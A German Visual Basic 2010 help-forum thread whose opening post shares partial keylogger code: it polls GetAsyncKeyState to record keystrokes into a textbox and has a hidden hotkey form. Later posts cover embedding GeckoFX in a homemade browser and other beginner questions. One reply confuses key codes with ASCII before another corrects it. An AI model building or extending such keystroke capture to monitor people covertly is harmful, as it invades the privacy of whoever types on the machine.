German Visual Basic 2010 - Skriptprobeme

9 replies
Goto Page
To the start Previous 1 Next To the start
Up
Chopii
User
Offline Off
Hi,

ich arbeite gerade an einem Keylogger für Zuhause. Bis zum folgenden habe ich es schon geschafft (Teil des Codes)

Code:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vkey As Integer) As Short

Private Sub timerKeys_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles timerKeys.Tick
        Dim key As String = ""
        Dim result As Integer
        Dim i As Integer
        For i = 1 To 255
            result = 0
            result = GetAsyncKeyState(i)
            If result = -32767 Then
                key = Chr(i)
                If i = 13 Then key = vbNewLine
                Exit For
            End If

        Next i


        If key <> Nothing Then
            If My.Computer.Keyboard.ShiftKeyDown OrElse My.Computer.Keyboard.CapsLock Then
                tbLog.Text &= key
            Else
                tbLog.Text &= key.ToLower

            End If
        End If


        If My.Computer.Keyboard.ShiftKeyDown AndAlso key = "J" AndAlso My.Computer.Keyboard.AltKeyDown Then
            Form2.Show()
        End If

    End Sub

Wenn ich z.b. <LSTRG> drücke, kommen solche Pfeile.
Und wie ich auch sehe gibt es auch Probleme, wenn ich <SHIFT> + 1 drücke. Da kommt ein verkehrtes Kreuz und eine 1 heraus (lolroflmao).
Daran erkenne ich, dass die Zahlencodes für die Tasten nicht vollständig definiert wurden. Z.B. <ALT> hat: 18 und 164. Deswegen schrieb ich:
Code:
1
If i = 18 and i = 164 Then key = "<ALT>"


Dummerweise kommen zwei komische Zeichen, aber nicht <ALT>.
Was muss ich da tun, um dies zu beheben?

LG,
Jaster
edited 1×, last 15.08.10 10:14:24 pm
05.08.10 05:38:15 pm
Up
NP_Beta
COMMUNITY BANNED
Offline Off
Ich kann nicht nachvollziehen das ASCII 18 oder ASCII 164 für ALT stehen würde. ASCII 16 steht für Device Control 2 (Ich nehme an pfeiltaste) und ASCII 164 für ñ.

Keine ahnung auf welchen seiten du dich herumtreibst, aber du hast wohl eine falsche ASCII-tabelle...oder du ließt sie falsch.
05.08.10 06:01:57 pm
Up
Chopii
User
Offline Off
Inwiefern eine falsche ASCII-Tabelle? Verwende Win7, da sollte es doch wie immer sein.
Man kann ja den Code lesen, wenn man das Chr(i) zu i macht. Bei <ALT> kommt 18 und 164 heraus.
Wieso geht eigentlich das
Code:
1
if i = 18 and i = 164 then key = "<ALT>"
gar nicht?
05.08.10 06:50:03 pm
Up
NP_Beta
COMMUNITY BANNED
Offline Off
schick mir mal das ganze programm dann lass ich mal einen schnellen blick drüber laufen. Ohne einzelschritt und direktfenster geht da garnicht.

Meine vermutung ist das VB nicht die korrekten werte (i) der ASCII tabelle ausgibt sondern für VB definierte. Aber wie gesagt, schick mir das komplette projekt.
05.08.10 09:54:18 pm
Up
stealth
User
Offline Off
Das sind anscheinend Tastencodes und nicht ASCII-Werte.

if i = 18 and i = 164
kann nicht funktionieren weil i nicht gleichzeitig 18 und 164 sein kann
Up
Chopii
User
Offline Off
@stealth, hat sich schon erledigt
-
Hallo,

ich programmiere an einem eigenem Webbrowser. Dabei will ich einen Download-Manager einbauen. Doch, wenn ich bei meinem Webbrowser auf ein Download-Link klicke, kommt nicht die Download-Manager Form sondern der nervige Internet Explorer Download Manager.
Was muss ich da bei meinem Browser umprogrammieren?

Lg,
Jaster
15.08.10 10:31:42 pm
Up
Ein anderer User
User
Offline Off
Garnicht, VB nutzt nunmal die IE Engine die auch den IE Downloadmanager startet was man afaik nicht umgehen kann. (also ist dein Browser afaik auch nur ein anderes fontent für den IE...)
IMG:http://img97.imageshack.us/img97/8027/15735.png
IMG:http://img147.imageshack.us/img147/4158/cprogrammeraa9.jpg
15.08.10 10:51:15 pm
Up
DEATHSHEAD
User
Offline Off
Das ist nicht ganz richtig, Ein anderer User. Es gibt Möglichkeiten andere Browser in seinen Script einzubinden. Ich hab mal für ein Visual Basic 2008 Project Firefox eingebaut, das ist nicht ganz so einfach wie es mit dem IE-Modul zu machen und es gibt nicht so viel Support aber es geht
Man kann sich die Dateien die man braucht irgendwo downloaden, ich weiss nur nicht mehr wo, aber wenn du nach "Gecko", "Firefox in Vb benutzen" etc. googlest wirst du sicher was finden.

MfG DEATHSHEAD

EDIT:
Hier kriegst du GeckoFX, den Browser.
Und hier ein Tutorial.
Ich hab immer eine Lösung! Sie passt nur nicht immer zum Problem.
15.08.10 11:58:20 pm
Up
Chopii
User
Offline Off
Danke, hat gut funktioniert.

Leider habe ich schon wieder ein Problem. Ich suche schon seit 30 Minuten an einer Möglichkeit, wie ich ein Tab im Browser zoomen kann. (Also Zoom-In und Zoom-Out Funktion)
Kennt irgendjemand einen Code für soetwas?

@edit: Ich habe auch noch ein zweiter Problem: Ich suche im Google schon seit Stunden, wie ich wie Firefox eine Sitzung speichern kann und nach Programmaufruf die Sitzung von meinem Programm laden kann...Wisst ihr vllt. etwas?
edited 2×, last 17.08.10 07:08:34 pm
27.08.10 07:49:21 pm
Up
T-REX0113
User
Offline Off
Ich hoffe ihr könnt mir helfen. Bin noch ein ehr neuling in VB2010.

edit:
Ich benutze Visual Basic 2010 Express Edition

Meine frage:

Wie kann man eine bestimmte stelle in einer variable abfragen?

also will damit etwas mit if machen

if var_zahl = [die 2. Stelle] = 2 then
blablabla
end if

also so der pseudo code

zur erklärung:

Wenn bei var_zahl die 2. stelle der zahl eine 2 ist dann passiert was.

oder anderes beispiel

wenn bei var_zahl die 4. Selle der zahl eine 5 steht dann
passiert was...

hoffe ihr versteht das problem und könnt mir helfen.

mfg
︻╤─── Nichts ist Wahr, Alles ist erlaubt ───╤︻
To the start Previous 1 Next To the start